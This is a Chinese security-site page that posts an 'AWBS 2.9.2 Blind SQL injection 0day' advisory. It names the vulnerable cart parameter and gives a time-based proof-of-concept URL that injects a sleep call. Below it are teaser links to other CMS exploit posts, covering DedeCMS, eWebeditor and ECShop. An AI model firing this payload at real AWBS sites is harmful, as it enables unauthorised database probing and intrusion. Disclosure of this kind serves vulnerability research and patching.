当前位置：代码网 > 服务器>网络安全>漏洞分析 > AWBS 2.9.2 Blind SQL 注入0day

AWBS 2.9.2 Blind SQL 注入0day

AWBS 2.9.2 Blind SQL 注入0dayAWBS 2.9.2 Blind SQL 注入0day，大家可以参考下。... 11-03-11

　　影响版本：awbs 2.9.2

　　官方网站：http://www.awbs.com

　　漏洞类型：sql注入

　　漏洞描述：

　　---vulnerability---

　　http(s)://[host]/cart?ca=add_other&oid=[true value]'[blind-sql]

　　=============================================================================================

　　---poc using time-based blind sql injection---

　　https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20and%20sleep(100)='

DEDECMS任意修改文章漏洞(exp)

DEDECMS任意修改文章漏洞(exp)　　这个漏洞不足以得到马儿但能修改任何文章也算是一个严重的漏洞!　　废话不说　　经典对白看代码!　　member... [阅读全文]
dedecms 5.6的最新注入漏洞

dedecms 5.6的最新注入漏洞　　最新dedecms 5.6的注入代码：　　http://www.dedecms.com/plus/rss.php?ti... [阅读全文]
eWebeditor漏洞的修补

eWebeditor漏洞的修补　　漏洞原理　　漏洞的利用原理很简单，请看Upload.asp文件：　　任何情况下都不允许上传asp脚本文件　　sAllo... [阅读全文]
dedecms织梦 v5.5 两处跨站漏洞

dedecms织梦 v5.5 两处跨站漏洞　　影响版本: 　　dedecms织梦5.5 　　漏洞描述: 　　demo1:http://www.dedecms.... [阅读全文]
发掘MaosinCMS网站系统漏洞与测试

发掘MaosinCMS网站系统漏洞与测试　　最近的动易CMS漏洞可以说着实火了一把，本文写的CMS虽然没有动易功能强大，但同样存在注入漏洞。这种漏洞用工具是扫... [阅读全文]
ecshop爆绝对路径的bug

ecshop爆绝对路径的bug　　ecshop爆绝对路径的bug 　　网址如下" 　　http://www.zzfhw.com/ECShop/inc... [阅读全文]


验证码：

相关文章: